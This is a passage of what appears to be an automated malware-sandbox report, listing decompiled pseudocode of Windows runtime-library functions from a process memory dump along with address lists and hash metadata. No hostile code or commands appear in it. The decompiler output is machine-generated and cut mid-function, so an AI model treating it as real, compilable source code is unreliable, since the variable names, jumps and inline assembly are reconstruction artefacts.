						_t88 = E017B500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01779860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                              0x017b51be
                                                                              0x017b51c3
                                                                              0x017b51c8
                                                                              0x017b51cd
                                                                              0x017b51d0
                                                                              0x017b51d3
                                                                              0x017b51d8
                                                                              0x017b51db
                                                                              0x017b51de
                                                                              0x017b51e0
                                                                              0x017b51e3
                                                                              0x017b51e6
                                                                              0x017b51e8
                                                                              0x017b5342
                                                                              0x017b5351
                                                                              0x017b5356
                                                                              0x017b535a
                                                                              0x017b5360
                                                                              0x017b5363
                                                                              0x017b5366
                                                                              0x017b5369
                                                                              0x017b5369
                                                                              0x017b536b
                                                                              0x017b536b
                                                                              0x017b5370
                                                                              0x017b53a3
                                                                              0x017b53a4
                                                                              0x017b53a6
                                                                              0x017b53ab
                                                                              0x017b53ab
                                                                              0x017b53ae
                                                                              0x017b53ae
                                                                              0x017b53b5
                                                                              0x017b53bf
                                                                              0x017b53bf
                                                                              0x017b5375
                                                                              0x017b5396
                                                                              0x017b53a0
                                                                              0x017b53a0
                                                                              0x00000000
                                                                              0x017b5396
                                                                              0x017b5377
                                                                              0x017b5379
                                                                              0x017b537f
                                                                              0x017b538c
                                                                              0x017b5390
                                                                              0x00000000
                                                                              0x017b5390
                                                                              0x017b51ee
                                                                              0x017b51f1
                                                                              0x017b5301
                                                                              0x017b5310
                                                                              0x017b5315
                                                                              0x017b5318
                                                                              0x017b531b
                                                                              0x017b5320
                                                                              0x017b532e
                                                                              0x017b5331
                                                                              0x00000000
                                                                              0x017b5331
                                                                              0x017b5328
                                                                              0x017b5329
                                                                              0x00000000
                                                                              0x017b5329
                                                                              0x017b51fa
                                                                              0x017b5235
                                                                              0x017b5236
                                                                              0x017b5239
                                                                              0x017b523f
                                                                              0x017b5240
                                                                              0x017b5241
                                                                              0x017b5242
                                                                              0x017b5246
                                                                              0x017b5247
                                                                              0x017b524e
                                                                              0x017b5251
                                                                              0x017b5267
                                                                              0x017b5269
                                                                              0x017b526e
                                                                              0x017b527d
                                                                              0x017b527e
                                                                              0x017b5281
                                                                              0x017b5282
                                                                              0x017b5287
                                                                              0x017b5288
                                                                              0x017b528a
                                                                              0x017b528f
                                                                              0x017b5294
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017b529a
                                                                              0x017b529c
                                                                              0x017b529e
                                                                              0x017b529e
                                                                              0x017b52a4
                                                                              0x017b52b0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017b52ba
                                                                              0x017b52bc
                                                                              0x017b52bc
                                                                              0x017b52d4
                                                                              0x017b52d9
                                                                              0x017b52dc
                                                                              0x017b52e1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017b52e7
                                                                              0x017b52f4
                                                                              0x00000000
                                                                              0x017b52f4
                                                                              0x017b5270
                                                                              0x00000000
                                                                              0x017b5270
                                                                              0x017b51fc
                                                                              0x017b51fd
                                                                              0x017b5202
                                                                              0x017b5203
                                                                              0x017b5205
                                                                              0x017b520a
                                                                              0x017b520f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017b521b
                                                                              0x017b5226
                                                                              0x017b522b
                                                                              0x017b521d
                                                                              0x017b521d
                                                                              0x017b5222
                                                                              0x017b5222
                                                                              0x017b522d
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Legacy$UEFI
                                                                              • API String ID: 2994545307-634100481
                                                                              • Opcode ID: 0b335bfae2ed7f5992b64ac01c42aa55097abf0510e4acf8fbc8cbf95efe5b61
                                                                              • Instruction ID: 987a4dd388b623d827758810d01e16c851817a02aeb56e3b161a3af61a70524a
                                                                              • Opcode Fuzzy Hash: 0b335bfae2ed7f5992b64ac01c42aa55097abf0510e4acf8fbc8cbf95efe5b61
                                                                              • Instruction Fuzzy Hash: C35169B1A456099FDB25DFA8C880BEEFBF8FB48704F14406DE609EB251DB719941CB10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0173B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 78%
                                                                              			E0173B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x180f7a8);
				E0178D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0178D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0177D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0177F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0178DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0177B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0177B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0177E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0177A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                              0x0173b171
                                                                              0x0173b171
                                                                              0x0173b171
                                                                              0x0173b171
                                                                              0x0173b171
                                                                              0x0173b176
                                                                              0x0173b17b
                                                                              0x0173b180
                                                                              0x0173b186
                                                                              0x0173b18f
                                                                              0x0173b198
                                                                              0x0173b1a4
                                                                              0x0173b1aa
                                                                              0x01794802
                                                                              0x01794802
                                                                              0x01794805
                                                                              0x0179480c
                                                                              0x0179480e
                                                                              0x0173b1d1
                                                                              0x0173b1d3
                                                                              0x0173b1de
                                                                              0x0173b1de
                                                                              0x01794817
                                                                              0x0179481e
                                                                              0x01794820
                                                                              0x01794822
                                                                              0x01794822
                                                                              0x01794824
                                                                              0x01794824
                                                                              0x0179482a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01794835
                                                                              0x0179483a
                                                                              0x0179483d
                                                                              0x0179483f
                                                                              0x01794842
                                                                              0x01794842
                                                                              0x01794842
                                                                              0x01794846
                                                                              0x0179484c
                                                                              0x0179484e
                                                                              0x01794851
                                                                              0x01794851
                                                                              0x01794853
                                                                              0x01794854
                                                                              0x01794854
                                                                              0x01794858
                                                                              0x0179485a
                                                                              0x0179485a
                                                                              0x0179485d
                                                                              0x0179485f
                                                                              0x01794861
                                                                              0x01794861
                                                                              0x01794866
                                                                              0x0179486b
                                                                              0x0179486e
                                                                              0x01794871
                                                                              0x01794876
                                                                              0x01794876
                                                                              0x01794878
                                                                              0x0179487b
                                                                              0x01794884
                                                                              0x01794884
                                                                              0x00000000
                                                                              0x0179487d
                                                                              0x0179487d
                                                                              0x01794882
                                                                              0x01794889
                                                                              0x01794889
                                                                              0x0179488f
                                                                              0x01794891
                                                                              0x017948e0
                                                                              0x017948e2
                                                                              0x017948e4
                                                                              0x017948e4
                                                                              0x017948e7
                                                                              0x017948e7
                                                                              0x017948ed
                                                                              0x017948f4
                                                                              0x017948f6
                                                                              0x01794951
                                                                              0x01794951
                                                                              0x01794953
                                                                              0x01794953
                                                                              0x01794956
                                                                              0x01794956
                                                                              0x01794958
                                                                              0x01794959
                                                                              0x01794959
                                                                              0x0179495d
                                                                              0x0179495d
                                                                              0x0179495f
                                                                              0x0179495f
                                                                              0x01794965
                                                                              0x01794969
                                                                              0x017949ba
                                                                              0x017949ba
                                                                              0x017949c1
                                                                              0x017949c5
                                                                              0x017949cc
                                                                              0x017949d4
                                                                              0x017949d7
                                                                              0x017949da
                                                                              0x017949e4
                                                                              0x017949e5
                                                                              0x017949f3
                                                                              0x01794a02
                                                                              0x00000000
                                                                              0x01794a02
                                                                              0x01794972
                                                                              0x01794974
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01794976
                                                                              0x01794979
                                                                              0x01794982
                                                                              0x01794983
                                                                              0x01794984
                                                                              0x0179498b
                                                                              0x0179498d
                                                                              0x01794991
                                                                              0x01794993
                                                                              0x01794999
                                                                              0x0179499d
                                                                              0x017949a2
                                                                              0x017949a2
                                                                              0x017949a2
                                                                              0x01794999
                                                                              0x017949ac
                                                                              0x00000000
                                                                              0x017949b3
                                                                              0x017948f8
                                                                              0x017948fe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017948fe
                                                                              0x01794895
                                                                              0x0179489c
                                                                              0x017948ad
                                                                              0x017948b2
                                                                              0x017948b5
                                                                              0x017948b7
                                                                              0x017948ba
                                                                              0x017948bc
                                                                              0x017948c6
                                                                              0x017948c6
                                                                              0x017948cb
                                                                              0x017948d1
                                                                              0x017948d4
                                                                              0x017948d8
                                                                              0x017948d8
                                                                              0x00000000
                                                                              0x017948d8
                                                                              0x017948be
                                                                              0x017948c0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017948c2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017948c4
                                                                              0x00000000
                                                                              0x01794882
                                                                              0x0179487b
                                                                              0x01794904
                                                                              0x01794906
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01794908
                                                                              0x0179490e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01794910
                                                                              0x01794917
                                                                              0x01794917
                                                                              0x00000000
                                                                              0x01794917
                                                                              0x0173b1ba
                                                                              0x017947f9
                                                                              0x017947fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017947fc
                                                                              0x0173b1c0
                                                                              0x0173b1c0
                                                                              0x0173b1c3
                                                                              0x0173b1cb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _vswprintf_s
                                                                              • String ID:
                                                                              • API String ID: 677850445-0
                                                                              • Opcode ID: 161aabed350bbe58c002f4f310d93306829025ca2ef7860368a0537b39af7428
                                                                              • Instruction ID: 1b26aff647abe7cc315bcd2716ab930288204801cac0d8a805b94d6f25666822
                                                                              • Opcode Fuzzy Hash: 161aabed350bbe58c002f4f310d93306829025ca2ef7860368a0537b39af7428
                                                                              • Instruction Fuzzy Hash: 1B51D071D002598EEF31CF68DA45BBEFBB0BF04724F1041ADD85AAB286D774494ACB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0175B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 76%
                                                                              			E0175B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x182d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01757D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01808CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01779E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0177B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0177CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01757D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01808F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0177AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1828628; // 0x0
								_v68 = _t77;
								_t78 =  *0x182862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1828628; // 0x0
							_t116 =  *0x182862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                              0x0175b94c
                                                                              0x0175b956
                                                                              0x0175b95c
                                                                              0x0175b95e
                                                                              0x0175b964
                                                                              0x0175b969
                                                                              0x0175b96d
                                                                              0x0175b96d
                                                                              0x0175b970
                                                                              0x0175b974
                                                                              0x0175b97a
                                                                              0x0175badf
                                                                              0x0175badf
                                                                              0x0175bae2
                                                                              0x0175bae4
                                                                              0x0175bae6
                                                                              0x0175baf0
                                                                              0x017a2cb8
                                                                              0x0175baf6
                                                                              0x0175baf6
                                                                              0x0175baf6
                                                                              0x0175bafd
                                                                              0x0175bb1f
                                                                              0x0175bb1f
                                                                              0x0175baff
                                                                              0x0175bb00
                                                                              0x0175bb00
                                                                              0x0175bb03
                                                                              0x0175bb03
                                                                              0x0175bacb
                                                                              0x0175bacf
                                                                              0x0175bad0
                                                                              0x0175bad1
                                                                              0x0175badc
                                                                              0x0175badc
                                                                              0x0175b980
                                                                              0x0175b980
                                                                              0x0175b988
                                                                              0x0175b98b
                                                                              0x0175b98d
                                                                              0x0175b990
                                                                              0x0175b993
                                                                              0x0175b999
                                                                              0x0175b99b
                                                                              0x0175b9a1
                                                                              0x0175b9a5
                                                                              0x0175b9aa
                                                                              0x0175b9b0
                                                                              0x0175b9bb
                                                                              0x0175b9c0
                                                                              0x0175b9c3
                                                                              0x0175b9ca
                                                                              0x0175b9cc
                                                                              0x0175b9cf
                                                                              0x0175b9d3
                                                                              0x0175b9d7
                                                                              0x0175ba94
                                                                              0x0175ba94
                                                                              0x0175ba98
                                                                              0x0175baa3
                                                                              0x017a2ccb
                                                                              0x0175baa9
                                                                              0x0175baa9
                                                                              0x0175baa9
                                                                              0x0175bab1
                                                                              0x017a2cd5
                                                                              0x017a2cdd
                                                                              0x017a2cdd
                                                                              0x0175babb
                                                                              0x0175babc
                                                                              0x0175bac2
                                                                              0x0175bac3
                                                                              0x0175bac3
                                                                              0x0175bac6
                                                                              0x00000000
                                                                              0x0175b9dd
                                                                              0x0175b9dd
                                                                              0x0175b9e7
                                                                              0x0175b9e7
                                                                              0x0175b9ec
                                                                              0x0175b9ec
                                                                              0x0175b9f1
                                                                              0x0175b9f5
                                                                              0x0175b9fa
                                                                              0x0175ba00
                                                                              0x0175ba0c
                                                                              0x0175ba10
                                                                              0x0175ba10
                                                                              0x0175ba12
                                                                              0x0175ba18
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0175bb26
                                                                              0x0175bb26
                                                                              0x0175ba1e
                                                                              0x0175ba1e
                                                                              0x0175ba23
                                                                              0x0175ba25
                                                                              0x0175ba2c
                                                                              0x0175ba30
                                                                              0x0175ba35
                                                                              0x0175ba35
                                                                              0x0175ba41
                                                                              0x0175ba46
                                                                              0x0175ba4c
                                                                              0x0175ba50
                                                                              0x0175ba54
                                                                              0x0175ba6a
                                                                              0x0175ba6e
                                                                              0x0175ba70
                                                                              0x0175ba74
                                                                              0x0175ba78
                                                                              0x0175ba7a
                                                                              0x0175ba7c
                                                                              0x0175ba8e
                                                                              0x0175ba90
                                                                              0x0175ba92
                                                                              0x0175bb14
                                                                              0x0175bb14
                                                                              0x0175bb16
                                                                              0x0175bb16
                                                                              0x00000000
                                                                              0x0175ba7c
                                                                              0x0175bb0a
                                                                              0x0175bb0d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0175bb0f

                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0175B9A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID:
                                                                              • API String ID: 885266447-0
                                                                              • Opcode ID: 9b5b18fb06fc99bf4def84c7e2071232cd49a3d10253c7faa725bf4f3632a49b
                                                                              • Instruction ID: 2a74dec0e982dd4f5065e1a3f178642d08ce6a33d6d8a91ab6936bfeb7b23554
                                                                              • Opcode Fuzzy Hash: 9b5b18fb06fc99bf4def84c7e2071232cd49a3d10253c7faa725bf4f3632a49b
                                                                              • Instruction Fuzzy Hash: CA515771A08341CFC761CF68C48492AFBF6FB88610F54896EFA8587359D7B0E944CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01762581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 86%
                                                                              			E01762581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, void* _a12, void* _a16, void* _a20, void* _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				void* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t275;
				intOrPtr _t281;
				signed int _t283;
				signed int _t285;
				unsigned int _t291;
				signed int _t295;
				signed int _t322;
				signed int _t324;
				signed int _t329;
				signed int _t330;
				signed int _t332;
				void* _t333;
				signed int _t336;
				signed int _t339;
				signed int _t340;

				_t336 = _t339;
				_t340 = _t339 - 0x4c;
				_v8 =  *0x182d360 ^ _t336;
				_t329 = 0x182b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t291 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t281 = 0x48;
				_t311 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t322 = 0;
				_v37 = _t311;
				if(_v48 <= 0) {
					L16:
					_t45 = _t281 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t330 = 0xc0000106;
						goto L32;
					} else {
						_t329 = L01754620(_t291,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t281);
						_v52 = _t329;
						__eflags = _t329;
						if(_t329 == 0) {
							_t330 = 0xc0000017;
							goto L32;
						} else {
							 *(_t329 + 0x44) =  *(_t329 + 0x44) & 0x00000000;
							_t50 = _t329 + 0x48; // 0x48
							_t324 = _t50;
							_t311 = _v32;
							 *((intOrPtr*)(_t329 + 0x3c)) = _t281;
							_t283 = 0;
							 *((short*)(_t329 + 0x30)) = _v48;
							__eflags = _t311;
							if(_t311 != 0) {
								 *(_t329 + 0x18) = _t324;
								__eflags = _t311 - 0x1828478;
								 *_t329 = ((0 | _t311 == 0x01828478) - 0x00000001 & 0xfffffffb) + 7;
								E0177F3E0(_t324,  *((intOrPtr*)(_t311 + 4)),  *_t311 & 0x0000ffff);
								_t311 = _v32;
								_t340 = _t340 + 0xc;
								_t283 = 1;
								__eflags = _a8;
								_t324 = _t324 + (( *_t311 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t275 = E017C39F2(_t324);
									_t311 = _v32;
									_t324 = _t275;
								}
							}
							_t295 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t330 = _v68;
								__eflags = 0;
								 *((short*)(_t324 - 2)) = 0;
								goto L32;
							} else {
								_t285 = _t329 + _t283 * 4;
								_v56 = _t285;
								do {
									__eflags = _t311;
									if(_t311 != 0) {
										_t240 =  *(_v60 + _t295 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t285 =  *(_v60 + _t295 * 4);
										 *(_t285 + 0x18) = _t324;
										_t244 =  *(_v60 + _t295 * 4);
										__eflags = _t244 - 8;
										if(__eflags > 0) {
											goto L56;
										} else {
